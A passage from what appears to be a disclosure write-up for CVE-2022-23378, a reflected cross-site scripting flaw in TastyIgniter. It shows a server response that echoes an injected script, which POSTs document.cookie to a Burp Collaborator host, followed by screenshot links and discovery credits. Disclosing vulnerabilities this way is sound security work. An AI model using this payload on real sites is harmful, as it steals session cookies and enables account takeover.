Set-Cookie: tastyigniter\_session=eyJpdiI6Ik16bUtDZUV6eEw3RzByeG1LTWNBdUE9PSIsInZhbHVlIjoiQUgrTkJ1b2tmMzlFenVDVFlZZ1FHa0d5eVVITUFvT0t0YS9vcklNaHRKMnJYQjYwUyt5S3EySVpLWkpCSzR0YkhTS283VHV4d21KRjhCeHBZQ2NXbGlVRFVBcm9jR1dZbVlsdGZEdzFGZzQwQ2VjVjN1VkZ6ZWh2NmRGZis5dFEiLCJtYWMiOiI3YWQ4ZTM0NzBkZWIyZTNmNmE2OWM3NmJkMWJkYzgwNWYzYzRkNjQ2NjY5OGU2NzhkNjY5YTRlMWNmOTFiMjY0IiwidGFnIjoiIn0%3D; expires=Fri, 14-Jan-2022 23:21:27 GMT; Max-Age=7200; path=/; httponly; samesite=lax
Content-Length: 183
Connection: close
Content-Type: text/html; charset=UTF-8

File not found at path: uploads/doesnotexist<script\>fetch('https:/vgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net',{method: 'POST',mode: 'no-cors',body:document.cookie});</script\>

![03_Server_Response](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/03_Server_Response.png)

**Collaborator Interaction:**

![04_Collaborator_Hit](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/04_Collaborator_Hit.png)

![05_Collaborator_Interaction](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/05_Collaborator_Interaction.png)

**Discovery**

January 2022

*   Eric Getchell - TheGetch

Tag

#apple